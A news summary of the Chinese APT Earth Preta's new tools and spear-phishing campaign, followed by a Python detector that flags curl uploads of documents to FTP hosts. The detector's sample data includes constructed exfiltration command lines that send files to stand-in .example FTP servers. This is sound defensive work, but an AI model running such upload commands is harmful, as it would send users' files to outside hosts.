TLDR:
Earth Preta (Mustang Panda), a sophisticated Chinese APT group, has added new tools to its cyberattack arsenal, including the HIUPAN worm and PUBLOAD malware. The group now targets government entities in the Asia-Pacific region using spear-phishing tactics. The multi-stage attack includes tools like FDMTP and PTSOCKET and uses exfiltration methods like cURL to FTP sites. The group's evolving tactics and evasion techniques pose a significant threat.
Earth Preta Hackers Added New Tools To Their Arsenal
Earth Preta, also known as Mustang Panda, Bronze President, RedDelta, and Red Lich, is a Chinese APT group that targets government entities globally, with a focus on the Asia-Pacific region. Recently, the group has added new tools to its cyberattack strategy, including the HIUPAN worm, which disseminates PUBLOAD malware through removable drives. The group uses tools like FDMTP for malware downloading and PTSOCKET for exfiltration. The campaign begins with spear-phishing emails carrying .url attachments, which trigger a multi-stage malware deployment process. The attacks target specific files with extensions like .doc, .xls, and .pdf. The evolving tactics and sophisticated evasion techniques of Earth Preta pose a significant threat to various sectors.
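A defender-side check for the cURL-to-FTP exfiltration step mentioned above, as an added example that is not from the original article: it parses process-creation command lines and reports curl uploads to FTP hosts, marking files whose extension is one the article lists. It assumes the upload uses curl's standard `-T`/`--upload-file` option (the article gives no command line); the function name, sample command lines and `.example` hosts are constructed for illustration.

```python
import ntpath
import shlex
from urllib.parse import urlsplit

# Extensions the article lists as collection targets.
TARGET_EXTS = {".doc", ".xls", ".pdf"}

# Constructed process-creation command lines (not real telemetry);
# hosts use the reserved .example TLD.
SAMPLE_CMDLINES = [
    r'curl.exe -T "C:\ProgramData\stage\report.doc" ftp://user:pw@ftp.files.example/in/',
    r'C:\Windows\System32\curl.exe --upload-file C:\Temp\a.rar ftp://ftp.files.example/',
    r'curl.exe -o C:\Temp\setup.msi https://downloads.example/setup.msi',
    r'curl.exe -T C:\Temp\notes.pdf https://intranet.example/upload',
    r'notepad.exe C:\Users\a\budget.xls',
]

def find_curl_ftp_uploads(cmdline):
    """Return one dict per local file that a curl command line uploads to an FTP URL."""
    try:
        # posix=False keeps Windows backslashes; quotes are stripped by hand.
        argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes: leave for manual review
        return []
    if not argv or ntpath.basename(argv[0]).lower() not in ("curl", "curl.exe"):
        return []
    files, hosts = [], []
    args = iter(argv[1:])
    for arg in args:
        if arg in ("-T", "--upload-file"):
            files.append(next(args, ""))       # option value is the next argument
        elif arg.startswith("--upload-file="):
            files.append(arg.split("=", 1)[1])
        elif arg.startswith("-T"):
            files.append(arg[2:])              # attached form: -Tfile
        else:
            try:
                url = urlsplit(arg)
            except ValueError:                 # malformed URL-like argument
                continue
            if url.scheme.lower() in ("ftp", "ftps") and url.hostname:
                hosts.append(url.hostname)
    return [{"file": f, "host": h,
             "targeted_ext": ntpath.splitext(f)[1].lower() in TARGET_EXTS}
            for f in files if f for h in hosts]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for hit in find_curl_ftp_uploads(line):
            print(hit)
```

An upload of a non-document file (such as an archive) is still reported, with `targeted_ext` set to false, so staged archives are not missed.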